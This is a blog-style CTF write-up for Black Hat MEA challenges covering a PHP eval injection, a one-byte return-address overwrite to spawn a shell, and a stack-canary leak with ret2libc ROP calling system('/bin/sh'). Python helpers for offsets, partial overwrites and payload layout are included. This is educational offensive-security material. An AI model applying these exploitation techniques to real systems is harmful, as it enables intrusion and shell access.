trustie_rity
7 min read · Oct 3, 2022

BLACK HAT MIDDLE EAST AND AFRICA CTF

This is yet another awesome CTF I played. Below is a writeup of the challenges I solved.

Web Exploitation

peeHpee

This is an easy web challenge, and this is how I solved it.

The next thing to do is intercept the request using Burp Suite. From here we can decide what to do.

So we get a nice comment there telling us to check the source parameter. Juicy, right? 😍

Nice, when we set the source parameter we get the PHP source code. This is nice since we can now use the code to find our way in. Since I don't understand the code, we can use PHP's interactive shell to do some testing.

First, from the source code we know the email should be admin@naruto.com.
Notice they are using strict comparison, so PHP type juggling won't apply here. Sad 🥲
Second, we know the password is SuperSecRetPassw0rd, but sadly if we give these values as our input we get the response Hacking Attempt detected.
This is because there are some checks being done on the password. From the screenshot we can note some interesting parts:
a) $x=$_POST["test"];
- so if we post a value with the parameter test, it will be assigned to the x variable.
b) eval("return \$inp=\"$inp\";")
- eval is being called on the user's input. This is dangerous, since this PHP function executes the user's input as PHP code.

Now we can use this knowledge to test the theory.

php -a

Now let's use our findings to get the flag :)

Exactly what we were supposed to do 😊😊

Exploit Development

fno-stack-protector

Here we are provided with a binary; the first thing we can do is check the properties of the binary.

➜  fnostack_protector checksec --format=json --file=main | jq .main

This looks like a tough one, but at least the canary is off so we don't have to worry about it. Next let's try to learn what the binary is doing by running it and trying some inputs on it, i.e. if it asks for input :)

python3 -c "print('A'*40)" | ./main

Nice, we get a segmentation fault. Let's go ahead and check the functions present in the binary.

nm -j main | grep -v "__"
So these 3 functions stand out; we can use gdb's disassembler to get the disassembly of the vuln and bad_function functions.
From the disassembly we can tell that if we jump into bad_function we will land in a shell. We can also note that the vuln function is where we get an overflow, since it reads more than the local variable can hold.

Since we have a theory on what to do, we can jump in and do dynamic analysis now.

Set a breakpoint at the vuln function's ret instruction and let's overflow the buffer with a pattern. This way we can get the offset.

Let's get the offset now

Now we know the offset is 18. The next thing we need to do is figure out how we will jump into bad_function. Since we can't leak any address this will be tough 😂😂. Let's run the binary again and see whether the stack has a useful address we can use. Also, remember how every function is placed in its own stack frame on the stack 🤔🤔? Nice, that means the saved return address can be some address close to what we want. Hmm! Let's see..
Exactly: we can overflow with an 8 at the end to jump into bad_function. In cases like this you need to be very careful about how you send your input. You should probably use Ctrl+D, for the obvious reasons that we know 🤭
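To make the trick concrete, here is an added example (not the author's script) showing why overwriting only the last byte of the saved return address is enough: the return address into main and bad_function live in the same PIE image and differ only in their low byte, and Linux does not randomize the low 12 bits of a mapping, so that byte is the same on every run. It also explains the Ctrl+D advice: finishing the line with Enter would place an extra byte right after the one we want to change. The addresses in the block are constructed for illustration, not taken from the challenge binary.

```python
# Added example (not the author's exploit script): why a single-byte
# overwrite of the saved return address can redirect execution under PIE.
# Addresses below are constructed for illustration, not from the challenge.


def partial_overwrite(saved_ret: int, target: int) -> bytes:
    """Return the shortest little-endian byte suffix that turns the saved
    return address into the target address.

    x86-64 stores the address little-endian, so overflowing "one more byte"
    past the buffer replaces only the lowest byte of the address; the high
    bytes keep whatever the binary's load address put there.
    """
    saved = saved_ret.to_bytes(8, "little")
    wanted = target.to_bytes(8, "little")
    for k in range(9):
        # Everything above the first k (low) bytes already agrees.
        if saved[k:] == wanted[k:]:
            return wanted[:k]
    raise AssertionError("unreachable: 8 bytes always suffice")


def randomized_bits(k: int) -> int:
    """Bits of ASLR entropy a k-byte overwrite would have to guess.
    Linux keeps the low 12 bits (the page offset) fixed, so a 1-byte
    overwrite is deterministic and a 2-byte overwrite leaves 4 unknown bits."""
    return max(0, 8 * k - 12)


# Constructed sample: a return address into main and bad_function in the
# same 256-byte window, which is the situation the writeup relies on.
SAVED_RET = 0x555555555186
BAD_FUNCTION = 0x555555555108

if __name__ == "__main__":
    tail = partial_overwrite(SAVED_RET, BAD_FUNCTION)
    print(tail, randomized_bits(len(tail)))  # b'\x08' 0
```

With the constructed addresses a single byte does the job and nothing has to be guessed; had bad_function sat one 256-byte window further away, two bytes would be needed and four bits of the address would be unknown on each run.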

So we can use my script to do just that and land on a shell :)

Now run the script with the argument remote to land on a shell remotely 😍

secret_note

Like all of the exploit development challenges, we are given a Dockerfile with the necessary binaries. Let's check the security properties of the binary.

➜  secret_notes checksec --format=json --file=main | jq .main

Oh man, all security protections are enabled; looks like it's gonna be tough 🥲. Let's run the binary and see what exactly it's doing…

This looks like it's gonna be easier than I thought 😂😂. First let's get the canary value, because the “stack smashing detected” message has really started getting on my nerves. We can use gdb for that...
➜ secret_notes gdb main -q
(gdb) set disassembly-flavor intel
(gdb) set pagination off
(gdb) disass main
(gdb) b *main+143
(gdb) r
So the 11th value on the stack holds the canary value, so we are gonna make sure that in our exploit we place the input this way:
junk + canary + junk
So the next thing we need to do is get the offset to the canary :)
So let's get the offset:
So the offset is 56, nice. The next thing we need to do now is decide what we want to do after we overflow the buffer.
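Both offsets in this writeup (18 in fno-stack-protector, 56 here) come from the same trick: send a pattern in which every short window is unique, then look up where the bytes that ended up in the saved return address sit in that pattern. The following added example (not the author's script) writes that out in plain Python, the same idea as pwntools' cyclic() and cyclic_find(); the "crash" is simulated by slicing the pattern, since there is no binary to run here.

```python
# Added example (not the author's script): a cyclic pattern whose every
# 4-byte window is unique, and a lookup that turns the value found in the
# saved return address into the offset. Same idea as pwntools'
# cyclic()/cyclic_find(), written out in plain Python.
from itertools import islice
from string import ascii_lowercase


def _de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence B(k, n): any n consecutive chars
    occur exactly once, so a prefix of it has unique n-byte windows."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (unique n-byte windows)."""
    return "".join(islice(_de_bruijn(ascii_lowercase, n), length)).encode()


def cyclic_find(pattern: bytes, value, n: int = 4) -> int:
    """Offset of `value` in `pattern`. `value` may be an int read from a
    register (interpreted little-endian) or raw bytes; only the first n
    bytes are needed because every n-byte window is unique."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    idx = pattern.find(value[:n])
    if idx < 0:
        raise ValueError("value does not come from this pattern")
    return idx


def simulate_crash(pattern: bytes, offset: int) -> int:
    """Constructed stand-in for gdb: the 8 bytes that land in the saved
    return address when the buffer starts `offset` bytes below it."""
    return int.from_bytes(pattern[offset:offset + 8], "little")


if __name__ == "__main__":
    pat = cyclic(200)
    rip = simulate_crash(pat, 18)           # what gdb would show for fno-stack-protector
    print(hex(rip), cyclic_find(pat, rip))  # ... 18
    print(cyclic_find(pat, simulate_crash(pat, 56)))  # 56, the canary offset here
```

In a real session the integer passed to cyclic_find is the value gdb shows in rip (or at the top of the stack at the ret breakpoint); the lookup only needs the low four bytes, which is why pwntools works with 4-byte windows by default.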
Well, one thing we can do is a ret2libc attack using some ROP, since in 64-bit binaries function calling is different (arguments are passed in registers, so the argument to system has to be placed in rdi); we need gadgets for that :)
Let's leak some values and see

Well, the 4th and 5th values look promising to me; I'll just use the 4th. Let's subtract the libc base from it and get the offset.

➜  ~ python3
Python 3.10.5 (main, Jun 8 2022, 09:26:22) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> libc = 0x7ffff7c00000
>>> addr = 0x7ffff7df4a50
>>> hex(addr - libc)
'0x1f4a50'
So next, a visual of how the exploit will look:
junk + canary + junk + rop
Our ROP will entail this:
system("/bin/sh")
So we will need to get the offset from the canary to the return address; easy to find using a script. I found it to be 8. The way to find it is to use a script that takes the 11th value and places it at your 56th input byte, then adds another pattern :D and sends it as the second input :)
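As an added example (not the author's script), the following Python sanity-checks the value taken from the 11th leaked slot before trusting it as the canary (a glibc stack canary on x86-64 is non-zero and always ends in a 0x00 byte) and builds the second input in the junk + canary + junk + rop shape with the 56 and 8 offsets from above. The leaked values are constructed and the ROP bytes are a placeholder. One caveat: the canary is chosen when the process starts, so the leak and the overflow have to hit the same process instance.

```python
# Added example (not the author's script): check the leaked canary and lay
# the second input out as the writeup describes: junk + canary + junk + rop.
# The leaked values below are constructed, not taken from the challenge.


def pick_canary(leaked: list, index: int = 11) -> int:
    """Return the index-th (1-based) leaked value after checking it looks like
    a glibc x86-64 stack canary: non-zero, with the lowest byte 0x00 (glibc
    zeroes that byte so string functions cannot copy the canary along)."""
    canary = leaked[index - 1]
    if canary == 0 or canary & 0xFF != 0:
        raise ValueError(f"{canary:#x} does not look like a stack canary")
    return canary


def build_payload(canary: int, rop: bytes,
                  canary_offset: int = 56, gap: int = 8) -> bytes:
    """junk + canary + junk + rop, with the offsets found in the writeup.
    The canary goes back exactly where it was, so the check in the
    function epilogue passes; `gap` covers the bytes up to the return address."""
    return (b"A" * canary_offset
            + canary.to_bytes(8, "little")
            + b"B" * gap
            + rop)


def return_slot(canary_offset: int = 56, gap: int = 8) -> int:
    """Byte offset at which the first ROP element (the return address) lands."""
    return canary_offset + 8 + gap


# Constructed leak: eleven values as the binary might print them, with the
# canary-shaped one in 11th position.
LEAKED = [0x1, 0x7ffff7aa1a50, 0x7ffff7a7f000, 0x7ffff7b0a0e0, 0x7ffff7aa1a50,
          0x0, 0x7fffffffe3c0, 0x1, 0x555555555260, 0x7fffffffe4b8,
          0x3d5a9c7e1b2f4a00]

if __name__ == "__main__":
    canary = pick_canary(LEAKED)
    payload = build_payload(canary, rop=b"\x00" * 24)  # placeholder ROP bytes
    print(hex(canary), len(payload), return_slot())  # 0x3d5a9c7e1b2f4a00 96 72
```

The low-byte check catches the most common mistake at this stage, picking the wrong stack slot: a pointer or a counter almost never ends in 0x00, while every glibc canary does.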
We need to get the offset of our gadget, i.e. pop rdi; ret
I will use ropper for this:
Now, having all that, we can come up with a simple script to drop us into a shell 😋😋😋
Well, let's see if it's working locally :D
Well well, this looks like it's working 😂. Waaait! This probably won't work on the remote server, because they might be using a different libc version.
Gilbert tells me I have to build the docker image they provided and get their libc from there. Oh man 😂😂😂, as long as my exploit works locally I won't touch it...
I'm guessing I'll have to do a separate note now using their libc from docker 😂😂😂. Till next time :D

Written by trustie_rity

Offensive Penetration Tester | M4lici0s Lif3 | Find video walkthroughs on my yt channel: https://www.youtube.com/@trustie_rity https://johnkiguru1337.github.io/
